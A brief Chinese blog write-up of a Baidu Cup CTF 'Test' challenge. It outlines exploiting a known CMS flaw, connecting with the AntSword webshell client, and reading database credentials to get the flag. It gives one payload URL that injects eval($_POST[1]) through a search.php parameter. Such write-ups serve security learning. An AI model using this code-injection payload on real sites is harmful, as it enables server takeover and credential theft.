“百度杯”CTF比赛 九月场_Test_WriteUp
打开网站
考点:已知CMS漏洞利用
在线搜索exploit
成功利用
蚁剑连接成功
找到flag
数据库配置文件
成功连接数据库 ,获得flag
payload
http://xxxxx/search.php?searchtype=5&tid=&area=eval($_POST[1])
本文来自博客园,作者:oldliutou,转载请注明原文链接:https://www.cnblogs.com/oldliutou/p/15632693.html